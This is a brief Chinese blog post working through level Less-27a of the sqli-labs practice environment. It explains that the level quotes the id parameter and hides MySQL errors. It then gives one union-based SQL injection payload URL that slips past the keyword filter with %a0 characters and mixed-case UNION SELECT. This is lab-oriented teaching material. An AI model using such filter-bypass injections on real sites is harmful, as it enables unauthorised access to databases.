sqli-labs ————less -27a(union、SELECT、繞過濾)

FLy_鵬程萬里發表於2018-05-16

Less-27a

本關與第27關的去唄在於對於ID的處理,這裡使用了“ ””,同時mysql的錯誤提示被遮蔽,所以報錯注入無法進行。對於過濾的繞過技巧在上一節中已經講過了,這裡不再多說了。下面給出一個payload:

http://192.168.11.136/sqli-labs/Less-27a?id=-1"%a0UnIon%a0SElecT%a01,user(),"3
讀者有興趣可以自己測試哈!


相關文章